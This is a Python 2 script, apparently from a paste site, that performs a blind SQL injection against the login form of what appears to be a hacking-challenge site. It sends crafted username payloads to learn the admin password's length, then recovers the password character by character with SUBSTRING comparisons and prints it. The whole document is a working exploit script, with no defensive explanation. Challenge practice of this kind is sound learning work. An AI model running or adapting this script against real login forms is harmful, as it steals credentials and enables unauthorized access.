#!/usr/bin/pythonimport urllibURL = 'http://hakerium.cba.pl/zad1/'REQUESTS

1. #!/usr/bin/python
2. import urllib
3. URL = 'http://hakerium.cba.pl/zad1/'
4. REQUESTS = 0
5.  
6. def query_returned_rows(html):
7.     return "logowanie." in html
8.  
9. def get_ith_password_char(i):
10.     global REQUESTS
11.     alphabet = "QWERTYUIOPASDFGHJKLZXCVBNMqwertyuiopasdfghjklzxcvbnm0123456789!@#$%^&*()-=[];',./<>?:|{}_+"
12.     for char in alphabet:
13.         sql_query = "admin' AND SUBSTRING(password,{},1)=BINARY '{}".format(i,char)
14.         post_query = urllib.urlencode({'username':sql_query,'password':''})
15.         u = urllib.urlopen(URL, post_query)
16.         REQUESTS+=1
17.         if query_returned_rows(u.read()):
18.             u.close()
19.             return char
20.         u.close()
21.            
22. def main():
23.     # Sprawdzamy dlugosc.
24.     global REQUESTS
25.     password_len = 0
26.     for i in xrange(2, 100):
27.         sql_query = "admin' AND LENGTH(password)={} OR '".format(i)
28.         post_query = urllib.urlencode({'username':sql_query, 'password':''})
29.         u = urllib.urlopen(URL, post_query)
30.         REQUESTS+=1
31.         if query_returned_rows(u.read()):
32.             password_len = i
33.             print 'Password\'s length is {}.'.format(password_len)
34.             break
35.         u.close()
36.     password = ""
37.     for i in xrange(1,password_len+1):
38.         password += get_ith_password_char(i)
39.         print "Gotcha! Password so far is: {}".format(password)
40.     print
41.     print "Password: {}".format(password)
42.     print "Requests needed: {}".format(REQUESTS)
43.        
44.        
45.    
46.  
47. if __name__ == '__main__':
48.     main()